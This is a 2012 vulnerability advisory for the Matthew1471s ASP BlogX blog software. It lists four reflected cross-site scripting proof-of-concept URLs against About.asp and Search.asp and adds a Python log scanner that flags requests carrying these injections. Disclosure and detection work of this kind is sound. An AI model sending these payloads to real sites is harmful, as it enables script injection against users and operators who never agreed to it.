Matthew1471s ASP BlogX - XSS Vulnerabilities



Title: Matthew1471s ASP BlogX - XSS Vulnerabilities

Software : Matthew1471s ASP BlogX

Software Version : 12 August 2008

Vendor: http://blogx.co.uk/

Vulnerability Published : 2012-03-26

Vulnerability Update Time :

Status :

Impact : Medium (CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:P/I:N/A:N)

Bug Description :
Matthew1471s ASP BlogX (version update : 12 August 2008) is vulnerable to cross-site scripting (XSS) through the request parameters listed below.

Proof Of Concept :
1) ShowOriginal parameter in About.asp, PoC:
http://VICTIM/About.asp?ShowOriginal=";><SCRIPT>alert("demonalex");</SCRIPT>&ShowNew=a&ShowChanges=b

2) ShowNew parameter in About.asp, PoC:
http://VICTIM/About.asp?ShowOriginal=Y&ShowNew=";><SCRIPT>alert("demonalex");</SCRIPT>&ShowChanges=b

3) ShowChanges parameter in About.asp, PoC:
http://VICTIM/About.asp?ShowOriginal=Y&ShowNew=a&ShowChanges=";><SCRIPT>alert("demonalex");</SCRIPT>

4) Search parameter in Search.asp, PoC:
http://VICTIM/Search.asp?Search=</title><SCRIPT>alert("demonalex");</SCRIPT>&Page=0

Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / ChaoYi.Huang@xxxxxxxxxxxxxxxx
Pentester/Researcher
Dark2S Security Team/PolyU.HK
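
A detection-side example, added here and not part of the original advisory: it scans IIS W3C-format access logs for requests to About.asp or Search.asp in which one of the four reported parameters carries HTML metacharacters after URL decoding. The log layout, the sample entries and the function names are assumptions made for this example.

```python
from urllib.parse import urlsplit, parse_qs

# Pages and parameters named in the advisory, matched case-insensitively.
WATCHED = {
    "about.asp": {"showoriginal", "shownew", "showchanges"},
    "search.asp": {"search"},
}
# Characters the advisory's PoC values rely on to leave the reflected context.
MARKUP = set('<>"')

def suspicious_params(request_target):
    """Return sorted names of watched parameters whose decoded value has markup."""
    parts = urlsplit(request_target)
    page = parts.path.lower().rsplit("/", 1)[-1]  # BlogX may live in a subfolder
    watched = WATCHED.get(page, set())
    # parse_qs percent-decodes names and values and turns '+' into a space.
    query = parse_qs(parts.query, keep_blank_values=True)
    return sorted(
        name for name, values in query.items()
        if name.lower() in watched and any(MARKUP & set(v) for v in values)
    )

def scan(log_lines):
    """Yield (client_ip, uri_stem, params) for each flagged W3C log entry."""
    cols = []
    for line in log_lines:
        if line.startswith("#Fields:"):
            cols = line.split()[1:]  # column order is declared by the log itself
            continue
        if line.startswith("#") or not line.strip() or not cols:
            continue
        row = dict(zip(cols, line.split()))
        stem, query = row.get("cs-uri-stem", ""), row.get("cs-uri-query", "-")
        hits = suspicious_params(stem if query == "-" else stem + "?" + query)
        if hits:
            yield row.get("c-ip", "-"), stem, hits

# Constructed sample entries (documentation IP range), not taken from a real server.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2012-03-26 10:00:01 192.0.2.10 GET /About.asp ShowOriginal=Y&ShowNew=a&ShowChanges=b 200
2012-03-26 10:00:05 192.0.2.77 GET /About.asp ShowOriginal=Y&ShowNew=%22%3B%3E%3Cb%3E&ShowChanges=b 200
2012-03-26 10:00:09 192.0.2.77 GET /blog/Search.asp Search=%3C%2Ftitle%3E%3Cb%3E&Page=0 200
2012-03-26 10:00:12 192.0.2.10 GET /Search.asp Search=asp+blog&Page=0 200
""".splitlines()

if __name__ == "__main__":
    for ip, stem, params in scan(SAMPLE_LOG):
        print(ip, stem, ",".join(params))
```

A legitimate quoted-phrase search also contains a double quote, so hits on the Search parameter are leads for review rather than confirmed abuse.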


